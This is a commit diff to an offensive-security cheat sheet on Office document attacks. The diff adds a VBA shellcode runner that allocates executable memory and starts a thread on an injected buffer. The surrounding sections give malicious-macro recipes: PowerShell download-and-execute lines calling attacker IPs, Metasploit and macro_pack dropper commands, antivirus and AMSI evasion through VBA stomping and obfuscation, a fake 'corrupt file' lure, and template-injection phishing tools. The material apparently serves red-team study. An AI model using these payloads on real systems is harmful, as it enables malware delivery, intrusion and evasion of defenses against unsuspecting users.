Add Office execute WinAPI via VBA

xuedipiaofei · Apr 20, 2023 · 2a4ce78 · 2a4ce78
1 parent 47df169
commit 2a4ce78
Showing 1 changed file with 79 additions and 30 deletions.
diff --git a/Methodology and Resources/Office - Attacks.md b/Methodology and Resources/Office - Attacks.md
@@ -1,9 +1,10 @@
 # Office - Attacks 
 
-## Summary
+### Summary
 
 * [Office Products Features](#office-products-features)
 * [Office Default Passwords](#office-default-passwords)
+* [Office Macro execute WinAPI](#office-macro-execute-winapi)
 * [Excel](#excel)
     * [XLSM - Hot Manchego](#xlsm---hot-manchego)
     * [XLS - Macrome](#xls---macrome)
@@ -51,8 +52,55 @@ By default, Excel does not set a password when saving a new file. However, some
 | Excel      | VelvetSweatshop  | all Excel formats |
 | PowerPoint | 01Hannes Ruescher/01 | .pps .ppt     |
 
+## Office Macro execute WinAPI
 
-## XLSM - Hot Manchego 
+### Description
+
+To importe Win32 function we need to use the keyword `Private Declare`
+`Private Declare Function <NAME> Lib "<DLL_NAME>" Alias "<FUNCTION_IMPORTED>" (<ByVal/ByRef> <NAME_VAR> As <TYPE>, etc.) As <TYPE>`
+If we work on 64bit, we need to add the keyword `PtrSafe` between the keywords `Declare` and `Function`
+Importing the `GetUserNameA` from `advapi32.dll`: 
+```VBA
+Private Declare PtrSafe Function GetUserName Lib "advapi32.dll" Alias "GetUserNameA" (ByVal lpBuffer As String, ByRef nSize As Long) As Long
+```
+`GetUserNameA` prototype in C: 
+```C
+BOOL GetUserNameA(
+  LPSTR   lpBuffer,
+  LPDWORD pcbBuffer
+);
+```
+### Example with a simple Shellcode Runner
+```VBA
+Private Declare PtrSafe Function VirtualAlloc Lib "Kernel32.dll" (ByVal lpAddress As Long, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr
+Private Declare PtrSafe Function RtlMoveMemory Lib "Kernel32.dll" (ByVal lDestination As LongPtr, ByRef sSource As Any, ByVal lLength As Long) As LongPtr
+Private Declare PtrSafe Function CreateThread Lib "KERNEL32.dll" (ByVal SecurityAttributes As Long, ByVal StackSize As Long, ByVal StartFunction As LongPtr, ThreadParameter As LongPtr, ByVal CreateFlags As Long, ByRef ThreadId As Long) As LongPtr
+
+Sub WinAPI()
+    Dim buf As Variant
+    Dim addr As LongPtr
+    Dim counter As Long
+    Dim data As Long
+
+    buf = Array(252, ...)
+    
+    addr = VirtualAlloc(0, UBound(buf), &H3000, &H40)
+    
+
+    For counter = LBound(buf) To UBound(buf)
+        data = buf(counter)
+        res = RtlMoveMemory(addr + counter, data, 1)
+    Next counter
+    res = CreateThread(0, 0, addr, 0, 0, 0)
+    
+
+End Sub
+```
+
+
+## Excel
+
+### XLSM - Hot Manchego 
 
 > When using EPPlus, the creation of the Excel document varied significantly enough that most A/V didn't catch a simple lolbas payload to get a beacon on a target machine.
 
@@ -65,7 +113,7 @@ PS> C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /reference:EPPlus.dll
 PS> .\hot-manchego.exe .\blank.xlsm .\vba.txt
 ```
 
-## XLM - Macrome
+### XLM - Macrome
 
 > XOR Obfuscation technique will NOT work with VBA macros since VBA is stored in a different stream that will not be encrypted when you password protect the document. This only works for Excel 4.0 macros.
 
@@ -96,7 +144,7 @@ Macrome build --decoy-document decoy_document.xls --payload-type Macro --payload
 When using Macrome build mode, the --password flag may be used to encrypt the generated document using XOR Obfuscation. If the default password of **VelvetSweatshop** is used when building the document, all versions of Excel will automatically decrypt the document without any additional user input. This password can only be set in Excel 2003.
 
 
-## XLM Excel 4.0 - SharpShooter
+### XLM Excel 4.0 - SharpShooter
 
 * https://github.com/mdsecactivebreach/SharpShooter
 
@@ -120,7 +168,7 @@ SharpShooter.py --payload slk --output foo --rawscfile /tmp/shellcode-86.bin --s
 ```
 
 
-## XLM Excel 4.0 - EXCELntDonut
+### XLM Excel 4.0 - EXCELntDonut
 
 * XLM (Excel 4.0) macros pre-date VBA and can be delivered in .xls files.
 * AMSI has no visibility into XLM macros (for now)
@@ -162,7 +210,7 @@ python3 drive.py --x64bin GruntHttpx64.bin --x86bin GruntHttpx86.bin
 XLM: https://github.com/Synzack/synzack.github.io/blob/3dd471d4f15db9e82c20e2f1391a7a598b456855/_posts/2020-05-25-Weaponizing-28-Year-Old-XLM-Macros.md
 
 
-## XLM Excel 4.0 - EXEC
+### XLM Excel 4.0 - EXEC
 
 1. Right Click to the current sheet
 2. Insert a **Macro IntL MS Excel 4.0**
@@ -175,7 +223,7 @@ XLM: https://github.com/Synzack/synzack.github.io/blob/3dd471d4f15db9e82c20e2f13
 5. Hide your macro worksheet by a right mouse click on the sheet name **Macro1** and selecting **Hide**
 
 
-## SLK - EXEC
+### SLK - EXEC
 
 ```ps1
 ID;P
@@ -186,8 +234,9 @@ C;X1;Y102;K0;EHALT()
 E
 ```
 
+## Word
 
-## DOCM - Metasploit
+### DOCM - Metasploit
 
 ```ps1
 use exploit/multi/fileformat/office_word_macro
@@ -200,7 +249,7 @@ set FILENAME Financial2021.docm
 exploit -j
 ```
 
-## DOCM - Download and Execute
+### DOCM - Download and Execute
 
 > Detected by Defender (AMSI)
 
@@ -215,7 +264,7 @@ Execute
 End Sub
 ```
 
-## DOCM - Macro Creator
+### DOCM - Macro Creator
 
 * https://github.com/Arno0x/PowerShellScripts/tree/master/MacroCreator
 
@@ -228,7 +277,7 @@ C:\PS> Invoke-MacroCreator -i meterpreter_shellcode.raw -t shellcode -url webdav
 C:\PS> Invoke-MacroCreator -i regsvr32.sct -t file -url 'http://my.server.com/sources.xml' -d biblio -c 'regsvr32 /u /n /s /i:regsvr32.sct scrobj.dll' -o -e
 ```
 
-## DOCM - C# converted to Office VBA macro
+### DOCM - C# converted to Office VBA macro
 
 > A message will prompt to the user saying that the file is corrupt and automatically close the excel document. THIS IS NORMAL BEHAVIOR! This is tricking the victim to thinking the excel document is corrupted.
 
@@ -238,7 +287,7 @@ https://github.com/trustedsec/unicorn
 python unicorn.py payload.cs cs macro
 ```
 
-## DOCM - VBA Wscript
+### DOCM - VBA Wscript
 
 > https://www.darkoperator.com/blog/2017/11/11/windows-defender-exploit-guard-asr-rules-for-office
 
@@ -263,7 +312,7 @@ CreateObject("WScript.Shell").Exec "notepad.exe"
 ```
 
 
-## DOCM - VBA Shell Execute Comment
+### DOCM - VBA Shell Execute Comment
 
 Set your command payload inside the **Comment** metadata of the document.
 
@@ -287,7 +336,7 @@ End Sub
 ```
 
 
-## DOCM - VBA Spawning via svchost.exe using Scheduled Task
+### DOCM - VBA Spawning via svchost.exe using Scheduled Task
 
 ```ps1
 Sub AutoOpen()
@@ -311,7 +360,7 @@ End Sub
 Rem powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.1.59:80/fezsdfqs'))"
 ```
 
-## DOCM - WMI COM functions
+### DOCM - WMI COM functions
 
 Basic WMI exec (detected by Defender) : `r = GetObject("winmgmts:\\.\root\cimv2:Win32_Process").Create("calc.exe", null, null, intProcessID)`
 
@@ -357,7 +406,7 @@ Set SW = GetObject("new:" & ShellWindows).Item()
 SW.Document.Application.ShellExecute "cmd.exe", "/c powershell.exe", "C:\Windows\System32", Null, 0
 ```
 
-## DOCM/XLM - Macro Pack - Macro and DDE
+### DOCM/XLM - Macro Pack - Macro and DDE
 
 > Only the community version is available online.
 
@@ -419,7 +468,7 @@ echo "x86.bin" "x64.bin" | macro_pack.exe -t AUTOSHELLCODE -o –autopack -G sc_
 echo "http://192.168.5.10:8080/x32calc.bin" "http://192.168.5.10:8080/x64calc.bin" | macro_pack.exe -t DROPPER_SHELLCODE -o --shellcodemethod=ClassicIndirect -G samples\sc_dl.xls
 ```
 
-## DOCM - BadAssMacros
+### DOCM - BadAssMacros
 
 > C# based automated Malicous Macro Generator.
 
@@ -443,7 +492,7 @@ BadAssMacros.exe -i <path_to_doc/excel_file> -w <doc/excel> -p yes -o <path_to_o
 ```
 
 
-## DOCM - CACTUSTORCH VBA Module
+### DOCM - CACTUSTORCH VBA Module
 
 > CactusTorch is leveraging the DotNetToJscript technique to load a .Net compiled binary into memory and execute it from vbscript
 
@@ -465,7 +514,7 @@ BadAssMacros.exe -i <path_to_doc/excel_file> -w <doc/excel> -p yes -o <path_to_o
 6. Use the generated code to replace the hardcoded binary in CactusTorch
 
 
-## DOCM - MMG with Custom DL + Exec
+### DOCM - MMG with Custom DL + Exec
 
 1. Custom Download in first Macro to "C:\\Users\\Public\\beacon.exe"
 2. Create a custom binary execute using MMG
@@ -514,7 +563,7 @@ Sub Auto_Open()
 End Sub
 ```
 
-## DOCM - ActiveX-based (InkPicture control, Painted event) Autorun macro
+### DOCM - ActiveX-based (InkPicture control, Painted event) Autorun macro
 
 Go to **Developer tab** on ribbon `-> Insert -> More Controls -> Microsoft InkPicture Control` 
 
@@ -526,21 +575,21 @@ End Sub
 
 
 
-## VBA Obfuscation
+### VBA Obfuscation
 
 ```ps1
 # https://www.youtube.com/watch?v=L0DlPOLx2k0
 $ git clone https://github.com/bonnetn/vba-obfuscator
 $ cat example_macro/download_payload.vba | docker run -i --rm bonnetn/vba-obfuscator /dev/stdin
 ```
 
-## VBA Purging
+### VBA Purging
 
 **VBA Stomping**: This technique allows attackers to remove compressed VBA code from Office documents and still execute malicious macros without many of the VBA keywords that AV engines had come to rely on for detection. == Removes P-code. 
 
 :warning: VBA stomping is not effective against Excel 97-2003 Workbook (.xls) format.
 
-### OfficePurge
+#### OfficePurge
 * https://github.com/fireeye/OfficePurge/releases/download/v1.0/OfficePurge.exe
 
 ```powershell
@@ -551,7 +600,7 @@ OfficePurge.exe -d word -f .\malicious.doc -l
 ```
 
 
-### EvilClippy
+#### EvilClippy
 
 > Evil Clippy uses the OpenMCDF library to manipulate CFBF files. 
 > Evil Clippy compiles perfectly fine with the Mono C# compiler and has been tested on Linux, OSX and Windows.
@@ -573,7 +622,7 @@ EvilClippy.exe -r macrofile.doc
 ```
 
 
-## VBA - Offensive Security Template
+### VBA - Offensive Security Template
 
 * Reverse Shell VBA - https://github.com/JohnWoodman/VBA-Macro-Reverse-Shell/blob/main/VBA-Reverse-Shell.vba
 * Process Dumper - https://github.com/JohnWoodman/VBA-Macro-Dump-Process
@@ -583,7 +632,7 @@ EvilClippy.exe -r macrofile.doc
 * amsiByPassWithRTLMoveMemory - https://gist.github.com/DanShaqFu/1c57c02660b2980d4816d14379c2c4f3
 * VBA macro spawning a process with a spoofed parent - https://github.com/christophetd/spoofing-office-macro/blob/master/macro64.vba
 
-## VBA - AMSI
+### VBA - AMSI
 
 > The Office VBA integration with AMSI is made up of three parts: (a) logging macro behavior, (b) triggering a scan on suspicious behavior, and (c) stopping a malicious macro upon detection. https://www.microsoft.com/security/blog/2018/09/12/office-vba-amsi-parting-the-veil-on-malicious-macros/
 
@@ -625,11 +674,11 @@ Private Sub Document_Open()
 End Sub
 ```
 
-## DOCX - Template Injection
+### DOCX - Template Injection
 
 :warning: Does not require "Enable Macro"
 
-### Remote Template
+#### Remote Template
 
 1. A malicious macro is saved in a Word template .dotm file
 2. Benign .docx file is created based on one of the default MS Word Document templates
@@ -647,7 +696,7 @@ End Sub
     ```
 7. File gets zipped back up again and renamed to .docx
 
-### Template Injections Tools
+#### Template Injections Tools
 
 * https://github.com/JohnWoodman/remoteInjector
 * https://github.com/ryhanson/phishery
@@ -661,7 +710,7 @@ $ phishery -u https://secure.site.local/docs -i good.docx -o bad.docx
 ```
 
 
-## DOCX - DDE
+### DOCX - DDE
 
 * Insert > QuickPart > Field
 * Right Click > Toggle Field Code